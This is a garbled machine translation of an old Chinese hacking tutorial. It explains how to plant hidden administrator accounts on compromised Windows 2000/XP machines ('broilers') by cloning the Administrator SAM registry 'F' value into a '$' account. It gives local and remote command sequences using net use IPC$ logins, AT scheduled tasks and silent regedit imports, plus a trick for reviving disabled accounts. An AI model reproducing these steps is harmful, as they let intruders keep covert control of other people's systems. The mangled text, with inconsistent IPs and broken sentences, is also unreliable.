Author: Source:
Chen Ten Thirteen Release Time: 2005-05-17 22:28:54
A few days ago, I saw a website (noticed, I am sorry ^ _ *), I saw a graphic tutorial to build hidden superuser, giving me a lot of inspiration, the author only explains how to The hidden super user is established under the local graphical interface, and the author said that he could not implement hidden superuser in the command line, so I started to explore, when I started, I used REG.EXE (version 3.0) as a command line. Take the tool to import the registry file, but after each import, the hidden superuser cannot be used, and then open the registry to view, find that this hidden superuser's default data type is not imported. Since this data type is a hexadecimal number (such as the default data type of Administrator to 000001F4, the data type in the following example is 00000409) instead of the string type, DWORD type, binary type The data type, REG.EXE cannot be identified, and thus cannot be imported, and the registry editor regedit.exe can be imported with the registry interface, and then I want to regedit.exe is a two-to-average program, it You can run in the Windows interface or run under DOS, and since the graphical interface regedit.exe can import this data type, then it should also be able to import this data type below, and later tried to prove my thoughts. . Below I put me this hidden super user creation method as follows: 1. How to build a hidden super user graphics interface on the graphical interface to apply to the broiler of the local or 3389 terminal service. The author I mentioned above is very good, but it is more complicated, and the PSU.exe (procedure to run as a system user), if you want to upload PSU.exe on the broiler. I said this method will not have to use the PSU.exe. Because Windows 2000 has two registry editors: regedit.exe and regedt32.exe. Regedit.exe and RegedT32.exe in XP are actually a program that modifies the "permission" in right-click "Permissions" when the key value is modified. I think everyone is familiar with regedit.exe, but it is not possible to set permissions to the registry, and the greatest advantage of RegedT32.exe is to set permissions to the registry. NT / 2000 / XP account information is under the hkey_local_machine / sam / sam key of the registry, but other users have no right to view the information inside, so I first use regedt32.exe to the SAM button. I am set to "Full Control" permissions. This allows the information in the SAM key to read and write. Specific steps are as follows: 1. Suppose we are on the broiler of the open terminal with superuser administrator, first create an account in the command line or account manager: Hacker $, here I set up this in the command line Account NET User Hacker $ 1234 / Add 2, enter: regedt32.exe and enter the regedt32.exe in the start / run. 3, click "Permissions" will then pop up the window point Add to add the account when I log in to the security bar. Here I log in as an administrator, so I will add the Administrator to, and set the permissions to "fully control". Here you need to explain: It is best to add the group where your logged in account or account is, do you want to modify the original account or group, otherwise a series of unnecessary issues will be brought. Waiting for hidden super users to build, come here to delete the account you add. 4, click "Start" → "Run" and enter "regedit.exe" Enter, start the registry editor regedit.exe.
Open button: hkey_local_maichine / sam / sam / domains / account / user / names / harnet $ "5, export item Hacker $, 00000409,000001f4 as Hacker.Reg, 409.REG, 1F4.REG, use Notepad to play this Several exported files are edited, copy the value of the key "f" under the item 000001f4 corresponding to the super user, and override the value of the key "f" under the item 00000409 corresponding to the Hacker, and then 00000409.REG and HACKER .reg merged. 6. Execute Net User Hacker $ / DEL in the command line to delete the user Hacker $ / DEL 7, press F5 to refresh within the regedit.exe window, then play the file - Import registry file Import a modified Hacker.reg to the registry. The original look (just remove the added account administrator). 9. Note: After the hidden superuser is built, you can't see the Hacker $ of the account manager, you can also see if the "Net User" command is not available in the account manager. When the super user is established, it will not change the password. If you use the NET user command to change the password of Hacker $, then this hidden superuser will be seen in Account Manager, and cannot be deleted. Remotely establishing a hidden super user in the command line will use the AT command because the planned task generated by AT is running as system, so it does not use the PSU.exe program. In order to be able to use the AT command, broiler must Open SCHEDULE service, if not open, the tool NetSvc.exe or sc.exe in the stream of light is remotely started, of course, the method can also be able to start the Schedule service. For command line mode, you can use a variety of connectivity Method, if you connect the MSSQL 1433 port with SQLEXEC, you can also use Telnet service, as long as you get a cmdshell, and you can run the AT command. 1, first find a broiler, as for how to come, not me The topic said here. First assume a broiler who found a super user for administrator, password 12345678, now we start to remotely establish a hidden super user for it in the command line. (The host in the example is my LAN One host, I will The IP address is changed to 13.50.97.238, and do not sit in the Internet to avoid harassing the normal IP address. 2, first establish a connection with the broiler, command is: Net use //13.50.97.238/ipc $ "12345678" / user: "Administrator 3, build a user on broiler with the AT command (if the AT service is not started, available Netsvc.exe or sc.exe is remotely started): AT //13.50.97.238 12:51 C: /Winnt/System32/Net.exe User Hacker $ 1234 / Add to build this add-on user name, Because of the addition of a series, use NET USER without displaying this user in the command line, but can see this user in Account Manager.
4. Export HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users in the same way: AT //13.50.97.238 12:55 C: /Winnt/Regedit.exe / e Hacker.reg HKEY_LOCAL_MACHINE / SAM / SAM / Domains / Account / Users / / E is the parameters of regedit.exe, and must be / ended in the _local_machine / sam / sam / domains / account / users / this key. If necessary, use quotation marks to cause "C: /Winnt/RegeDit.exe / e Hacker.reg HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / ACCOUNT / USERS /". 5. Download the Hacker.reg on broiler to this machine to open with Notepad to edit commands: COPY //13.50.97.238/admin (/11.50.97.238/admin) It has been introduced, and it will not be introduced here. 6, then copy the edited Hacker.reg to copy the broiler on C: /Hacker.Reg //13.50.97.238/admin $/system32/Hacker1.REG 7, view broilers Time //13.50.97.238 then use The AT command deletes the user HACKER $: AT //13.97.238 13:40 NET user HACKER $ / DEL 8, Verify that Hacker $ is deleted: Disconnect with broiler with NET Use //13.50.97.238 / del NET use //13.50.97.238/IPC $ "1234" / user: "HACKER $" is connected to the broiler with the broiler, and the description has been deleted. 9, then establish a connection with broiler: NET use //13.50.97.238/IPC $ "12345678" / user: "administrator" gets the broiler time, use the AT command to copy the broiler's Hacker1.REG import broiler registry: AT / /13.50.97.238 13:41 C: /Winnt/RegeDit.exe / s parameter / s parameter / s parameter / s refers to quiet mode. 10. Verify that the Hacker $ is established, the method is the same as above if the Hacker $ is deleted. 11, then verify that the user HACKER $ has read, write, deleted permissions, if you don't worry, you can also verify that you can build other accounts. 12, through 11 can determine the user HACKER $ with superuser privilege, because I originally used the AT command to build it is a normal user, but now there is remote read, write, deleted permissions. Third, if the broiler does not open 3389 terminal service, and I don't want to use the command line, what should I do? In this case, you can also use the interface to establish a hidden super user with broilers. Because regedit.exe, RegedT32.exe has the function of connecting to the network registry, you can use regedt32.exe to set permissions for the registry key of the remote host, with regedit.exe to edit the remote registry. The account manager also has a function of another computer, you can use the Account Manager to create and delete an account for the remote host. Specific step gathering is similar to the above, I don't say much, only its speed is unbearable. But there are two premise here: 1, first use the NET USE // Baby Chicken IP / IPC $ "Password" / user: "Super User Name" to establish a connection with the remote host to use regedit.exe regedt32.exe and account management Connect with the remote host.
2, the remote host must turn on the remote registry service (if not open, you can also open it remotely because you have a superuser password). 4. Establish hidden superusers with disabled accounts: We can use users from broiler to establish hidden hypercar. The method is as follows: 1. If you want to see what users are carefully prohibited, in general, some administrators usually disable guests for security, of course, if they are disabled. Under the graphical interface, it is very easy, as long as you can see a red cross on the disabled account; on the command line, I haven't thought of good ways, I can only use commands in the command line. : "NET User User Name" One one is to see if the user is disabled. 2. Here, we assume that the user Hacker is disabled by the administrator. First, I first clone the program Ca.exe first with Xiaoyan, and clone the disabled user Hacker into a super user (after cloning, the user's Hacker will be automatically activated): ca.exe // broiler IP Administrator Super User Password Hacher Hacher Password. 3. If you now have a cmdshell, if you use Telnet service or SQLEXEC to connect the shell of MSSQL's default port 1433, you can use the shell, then you only enter the command: Net user Hacker / Active: NO This user Hacker is disabled (at least surface This is the case), of course, you can also replace the user Hacher to other disabled users. 4. At this time, if you look at the user in the Account Manager under the graphical interface, you will find that the user Hacker is disabled, but is it true? You connect the broiler with this disabled user to see if it can be connected? Use the command: NET user // broiler ip / ipc $ "HACKER Password" / user: "Hacker" to see. I can tell you that after many tests, it can be successful, and it is superuser. 5. What if there is no cmdshell? You can disable the user Hacker; command format: AT // broiler ip Time NET user HACKER / ACTIVE: NO 6. Principle: I can't say the specific and deep principle, I can only say from the simplest. You first disable the Super User Administrator in the Account Manager in the Graphical Interface, and will definitely pop up a dialogue and prohibit you from to continue to disable superuser administrator, and because in cloning, Hacker "f" in the registry The key is replaced by the Super User Administrator in the "F" key of the registry, so Hacker has the permissions of the superuser, but because Hacker "c" in the registry, "C" is still the original "C" button, Hacker is still Disabled, but its superuser permissions will not be disabled, so users who are disabled can also connect to broilers, and also have superuser permissions. I don't understand, everyone's right and so understand. V. Note: 1. After the hidden super user is established, you can't see this user in the account manager and the command line, but this user exists. 2. After the hidden super user is established, the password cannot be changed again, because once the password is changed, this hidden super user is exposed to the account manager and cannot be deleted.